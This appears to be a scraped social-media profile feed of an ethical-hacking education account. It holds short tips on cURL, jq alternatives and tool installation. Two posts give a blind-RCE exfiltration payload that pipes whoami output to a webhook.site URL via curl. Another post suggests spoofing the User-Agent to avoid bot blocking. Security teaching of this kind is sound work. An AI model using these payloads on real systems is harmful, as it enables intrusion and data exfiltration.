
HackingHub
@hackinghub_io
Followers
8K
Following
206
Media
56
Statuses
3K
Educating the next generation of ethical hackers.
United Kingdom
Joined April 2019
Getting blocked by servers while using cURL?. Most sites donβt like requests from cURL and will often block it because it's a red flag for bots or scraping tools. Try changing your User-Agent header, like this:. curl "
https://hackinghub[.]io" -A "<NEW-USER-AGENT>"
0
8
104
Step 3: Exfiltrate Output Using Webhook[.]site using a payload like this:. curl -X POST -d "user=$(whoami)" https://webhook[.]site/YOUR-ID. This will send the output of whoami to your webhook URL as an HTTP POST request.
1
0
7
jq syntax tends to be complex. Hats off to anyone that knows it by heart. For those of you that would prefer something more simple, try @tomnomnom's gron. It makes JSON greppable and easy to filter. Check this out π
1
3
17
RT @RedTeamVillage_: Shoutout to @hackinghub_io for sponsoring Red Team Village at #DC33 as a Silver Sponsor! π₯π».Thanks for supporting theβ¦.
0
1
0
So you've confirmed RCE with a ;sleep 5 payload but can't see any output?. Try using to retrieve the output indirectly. Try this payload:.curl -X POST -d "user=$(whoami)" https://webhook[.]site/YOUR-ID. The result of whoami is sent to your webhook URL!
0
3
20
This is the quickest way to install and manage all of the amazing @pdiscoveryio tools:. β
Install all: pdtm -ia.π Update all: pdtm -ua.β Remove all: pdtm -ra (not sure why you'd need this one tbh)Β . Useful when setting up a new VPS!Β . Install pdtm π.
0
4
22